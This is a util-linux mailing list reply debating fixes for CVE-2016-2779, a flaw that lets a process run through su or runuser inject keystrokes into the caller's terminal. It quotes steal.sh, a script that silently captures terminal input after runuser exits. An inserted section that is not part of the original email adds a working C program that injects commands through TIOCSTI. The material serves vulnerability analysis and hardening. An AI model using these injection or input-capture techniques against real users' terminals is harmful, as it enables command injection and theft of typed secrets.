From: "Ángel González" <ingenit@zoho.com>
To: Stanislav Brabec <sbrabec@suse.cz>
Cc: util-linux@vger.kernel.org,
Federico Bento <up201407890@alunos.dcc.fc.up.pt>
Subject: Re: Fixing su + runuser vulnerability CVE-2016-2779
Date: Thu, 03 Mar 2016 00:39:48 +0100 [thread overview]
Message-ID: <56D779C4.3050800@zoho.com> (raw)
In-Reply-To: <56D7409A.6050407@suse.cz>
On 02/03/16 20:35, Stanislav Brabec wrote:
> Another possible fixes would be:
>
> - Request redirection of all I/O channels. (I. e. documentation fix
> plus possible command line option to make it simpler.)
>
> - Or create custom pty container (like script does).
>
> - Or create a kernel level fix restricting TIOCSTI and let utilities as
> they are.
>
> First two will have side effects, third seems to be a right way to me.
+1
IMHO a process without CAP_SYS_ADMIN (or similar) shouldn't be able to
fake input¹ into a terminal owned² by a different user.
¹ (yes, that's the goal of TIOCSTI)
² Not a complete solution, since you could have:
$ su root su $USER -s ./test_tiocsti
but if you are the owner of the terminal, it could do all kind of nasty
things all the way down anyway.
> Additionally, https://bugzilla.redhat.com/show_bug.cgi?id=173008 says,
> that even it does not handle all possible attacks, because attacker can
> still read and write to the terminal:
>
> ==== steal.sh ====
> #!/bin/sh
> (
> sleep 3
> exec 0>&1
> echo "Hallo">/dev/stdout
> cat>/tmp/nobody-savefile
> )&
> ==================
>
> ~/util-linux # ./runuser -u nobody ./steal.sh
> ~/util-linux # Hallo
Nice use of a background process with what is otherwise expected.
The point is that the user is tricked into thinking that the child process
[tree] has finished while it hasn't.
However, it doesn't seem to work here:
> ./steal.sh: line 5: /dev/stdout: Permission denied
> cat: -: Input/output error
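The mechanism the thread is arguing about, as an added illustration that is not Federico Bento's proof of concept nor util-linux code: a process that merely holds a descriptor to the terminal can push bytes into its input queue with TIOCSTI, and once su or runuser has exited, the parent shell reads those bytes as if the user had typed them. The probe below injects a harmless payload into the controlling terminal and reports why the kernel accepted or refused it, so an administrator can see whether the kernel-level restriction Stanislav and Ángel favour is in effect on a given machine. The function names and the payload string are mine; the interpretation of EIO assumes a kernel with the dev.tty.legacy_tiocsti sysctl (Linux 6.2 and later). Run it interactively on a tty (as the unprivileged user, ideally via su -s) to see the effect; on a pipe it simply reports ENOTTY.

```c
/* tiocsti_probe.c: added example, not code from the util-linux thread.
 * Demonstrates the mechanism behind CVE-2016-2779: any process holding an
 * fd to a terminal can fake keystrokes with TIOCSTI, and after su/runuser
 * returns, the calling shell reads them as if they had been typed.
 * Build: cc -o tiocsti_probe tiocsti_probe.c */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Push every byte of s into the input queue of the terminal behind fd.
 * TIOCSTI takes a pointer to a single character, so it is one ioctl per
 * byte. Returns 0 on success, -1 with errno set at the first refused byte. */
int tiocsti_push(int fd, const char *s)
{
    for (; *s; s++) {
        char c = *s;
        if (ioctl(fd, TIOCSTI, &c) == -1)
            return -1;
    }
    return 0;
}

/* Translate the result of tiocsti_push() into what it means for this attack.
 * err is 0 on success, otherwise the errno the ioctl left behind. */
const char *tiocsti_explain(int err)
{
    switch (err) {
    case 0:
        return "accepted: this terminal can be fed fake input";
    case ENOTTY:
        return "fd is not a terminal, nothing to inject into";
    case EPERM:
        /* Not our controlling tty and no CAP_SYS_ADMIN: the classic check. */
        return "refused: not the controlling tty and no CAP_SYS_ADMIN";
    case EIO:
        /* Assumption: Linux 6.2+ with dev.tty.legacy_tiocsti=0 answers EIO
         * to callers without CAP_SYS_ADMIN, i.e. the kernel-level fix. */
        return "refused: dev.tty.legacy_tiocsti=0 and no CAP_SYS_ADMIN";
    default:
        return strerror(err);
    }
}

int main(void)
{
    /* Constructed payload: leading newline so the shell that resumes after
     * su exits starts a fresh line, then a command for it to "type". */
    const char *payload = "\necho injected-by-TIOCSTI\n";

    int fd = open("/dev/tty", O_RDWR);   /* our controlling terminal */
    if (fd == -1) {
        perror("open /dev/tty");
        return 1;
    }
    int rc = tiocsti_push(fd, payload);
    int err = (rc == 0) ? 0 : errno;
    fprintf(stderr, "TIOCSTI on /dev/tty: %s\n", tiocsti_explain(err));
    close(fd);
    return rc == 0 ? 0 : 2;
}
```

The probe also shows why the "redirect all I/O" fix is fragile: it uses /dev/tty, not the inherited descriptors, so redirecting stdin/stdout/stderr of the child does not stop it; only dropping the controlling terminal (a separate session plus its own pty, as script does) or the kernel refusing the ioctl does.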
Thread overview: 19+ messages
2016-03-02 19:35 Fixing su + runuser vulnerability CVE-2016-2779 Stanislav Brabec
2016-03-02 23:39 ` Ángel González [this message]
2016-03-03 0:37 ` up201407890
2016-03-03 16:21 ` Stanislav Brabec
2016-03-04 16:13 ` Stanislav Brabec
2016-03-04 18:03 ` up201407890
2016-03-04 23:50 ` Ángel González
2016-03-08 16:33 ` Stanislav Brabec
2016-03-07 13:13 ` Karel Zak
2016-03-08 16:02 ` Stanislav Brabec
2016-09-29 14:40 ` Karel Zak
2016-10-02 13:16 ` Florian Weimer
2016-10-03 10:28 ` Karel Zak
2016-10-03 13:29 ` Karel Zak
2016-10-09 11:09 ` Florian Weimer
2016-10-03 15:04 ` Karel Zak
2016-10-03 15:48 ` Pádraig Brady
2016-10-03 16:25 ` Karel Zak
2016-10-11 14:19 ` Karel Zak